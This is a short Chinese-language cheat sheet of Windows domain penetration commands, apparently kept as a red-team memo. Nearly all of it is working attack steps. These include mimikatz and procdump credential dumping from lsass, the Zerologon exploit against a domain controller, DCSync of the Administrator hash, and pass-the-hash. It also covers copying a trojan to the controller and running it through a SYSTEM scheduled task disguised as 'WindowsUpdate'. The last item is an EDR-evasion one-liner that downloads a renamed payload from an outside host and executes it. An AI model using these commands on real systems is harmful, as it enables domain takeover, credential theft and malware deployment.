内网渗透备忘录

一些内网渗透命令

#抓取密码
logonpasswords

#查看域控 IP 和域控列表
shell ping pentest.com
shell net group "Domain Controllers" /domain

#使用zerologon漏洞将域控机器密码置空
mimikatz lsadump::zerologon /target:192.168.136.129 /account:WIN-DOBHQK3TVES$ /exploit


#使用空机器密码读取管理员哈希
mimikatz lsadump::dcsync /domain:pentest.com /dc:WIN-DOBHQK3TVES /User:Administrator /authuser:WIN-DOBHQK3TVES$ /authdomain:pentest /authpassword:"" /authntlm


#使用管理员哈希pth横向移动
mimikatz sekurlsa::pth /user:administrator /domain:pentest /ntlm:579da618cfbfa85247acf1f800a280a4 /run:"powershell -nop -w hidden"

#窃取令牌并将木马复制到域控
steal_token <pid>
shell copy C:\Users\user1\Desktop\https-processinject.exe \\192.168.136.129\c$\users\public


#在域控上设置计划任务运行已复制的木马
shell schtasks /create /s 192.168.136.129 /tn WindowsUpdate /sc minute /mo 1 /tr C:\users\public\https-processinject.exe /ru system /f

#域控上线后，在域控的交互会话中使用 zerologon 还原机器密码
mimikatz lsadump::postzerologon /target:192.168.136.129 /account:WIN-DOBHQK3TVES$


#绕过EDR使用浏览器下载并执行
start msedge http://192.168.1.1:19900/NNNNnop.rar && ping -n 10 127.0.0.1 >NUL && for /f %k in ('cmd /v:off /Q /c "for /f %i in (^'wmic logicaldisk get caption ^| findstr ":"^') do dir %i\ /b /s 2>nul | findstr "NNNNnop.rar""') do set kk=%k && (set dd=%kk:NNNNnop.rar=123456.exe%) && rename %k 123456.exe && ping -n 10 127.0.0.1 >NUL && cmd /c %dd%




#使用未被查杀的 procdump 导出目标主机的 lsass.dmp，再到本机用 mimikatz 读取密码
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit